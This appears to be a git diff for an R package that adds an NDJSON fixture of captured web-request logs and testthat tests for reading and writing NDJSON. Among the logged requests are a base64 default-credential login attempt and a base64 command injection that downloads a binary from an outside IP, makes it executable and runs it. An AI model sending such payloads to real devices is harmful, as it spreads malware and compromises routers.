"Method": "POST", "Path": "/boaform/admin/formLogin", "Http_Version": "HTTP/1.1", "POST_Payload": "dXNlcm5hbWU9YWRtaW4mcHNkPUZlZWZpZm9mdW0NCg0K"} +{"ip": "31.220.3.140", "Host": "116.202.22.148:8080", "User_Agent": "Hello World", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.186", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.186", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "apps.bekagvazava.com", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.186", "Accept_Encoding": "gzip", "Connection": "close", "Host": "apps.bekagvazava.com", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "114.96.103.33", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.49", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "69.164.217.74", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.79.181.104", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "78.108.177.51", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "45.128.232.183", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "159.100.22.178", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)", "Method": "GET", "Path": "/docker-compose.yml", "Http_Version": "HTTP/1.1"} +{"ip": "223.19.103.72", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTt3Z2V0IGh0dHA6Ly8xMDMuNjcuMTk3LjIzMy9tcHNsOyBjaG1vZCA3NzcgbXBzbDsgLi9tcHNsIGxibGluay5zZWxmcmVwOw0KDQo="} +{"ip": "84.54.51.190", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "139.144.168.186", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Mozilla/5.0", "Method": "GET", "Path": "/cHy8", "Http_Version": "HTTP/1.1"} +{"ip": "139.144.168.186", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Mozilla/5.0", "Method": "GET", "Path": "/BVXm", "Http_Version": "HTTP/1.1"} +{"ip": "185.91.127.166", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.208", "Host": "116.202.22.148:80", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.243.139.14", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/hudson", "Http_Version": "HTTP/1.1"} diff --git a/tests/testthat/test-ndjson.R b/tests/testthat/test-ndjson.R new file mode 100644 index 0000000..d099142 --- /dev/null +++ b/tests/testthat/test-ndjson.R @@ -0,0 +1,89 @@ + + +ref <- iris +ref$Species <- as.character(ref$Species) + +# transposed version +tref <- lapply(seq_len(length(ref[[1]])), function(i) lapply(ref, "[[", i)) + + +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +# Parse +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +test_that("ndjson works", { + + nd <- read_ndjson_file(test_path("ndjson/iris.ndjson" ), type = 'df') + ndz <- read_ndjson_file(test_path("ndjson/iris.ndjson.gz"), type = 'df') + + expect_identical(nd , ref) + expect_identical(ndz, ref) + expect_identical(nd , ndz) + + + ndl <- read_ndjson_file(test_path("ndjson/iris.ndjson"), type = 'list') + expect_length(ndl, 150) + lens <- lengths(ndl) + expect_equal(lens, rep(5, 150)) + + + + nd <- read_ndjson_file(test_path("ndjson/iris.ndjson"), nprobe = 2, + nskip = 10, nread = 10) + ref2 <- ref[11:20,] + rownames(ref2) <- NULL + expect_identical(nd, ref2) + + + + nd <- read_ndjson_file(test_path("ndjson/iris.ndjson"), type = 'list', + nskip = 10, nread = 10) + expect_length(nd, 10) + expect_error(read_ndjson_file("does_not_exist.txt")) +}) + + +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +# Serialize +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +test_that("write_ndjson_file df works", { + file <- tempfile() + write_ndjson_file(iris, file) + res <- read_ndjson_file(file) + expect_identical(res, ref) + + res <- read_ndjson_file(file, type = 'list') + expect_identical(res, tref) +}) + + +test_that("write_ndjson_str df works", { + file <- tempfile() + write_ndjson_file(iris, file) + ref <- write_ndjson_str(iris) + res <- paste(readLines(file), collapse = "\n") + expect_identical(res, ref) +}) + +test_that("write_ndjson_file list works", { + file <- tempfile() + write_ndjson_file(tref, file) + res <- read_ndjson_file(file, type = 'list') + expect_identical(res, tref) +}) + + + +test_that("write_ndjson_str list works", { + file <- tempfile() + write_ndjson_file(tref, file) + ref <- write_ndjson_str(tref) + res <- paste(readLines(file), collapse = "\n") + expect_identical(res, ref) +}) + + + + + + +